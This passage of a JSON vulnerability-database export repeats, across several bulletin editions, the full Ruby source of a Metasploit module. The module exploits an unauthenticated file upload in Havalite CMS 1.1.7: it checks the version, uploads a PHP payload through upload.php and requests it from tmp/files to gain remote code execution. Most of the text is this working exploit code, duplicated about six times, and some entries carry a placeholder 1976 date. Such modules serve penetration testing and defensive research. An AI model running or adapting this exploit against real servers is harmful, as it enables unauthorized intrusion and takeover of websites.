and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-15T19:13:30", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-15T21:21:24", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-15T21:21:24", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-20T19:20:10", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-20T19:20:10", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-20T21:20:42", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-20T21:20:42", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-28T19:40:50", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-28T19:40:50", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-28T21:36:45", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-05-28T21:36:45", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-30T20:32:07", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-06-30T20:32:07", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-30T22:40:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 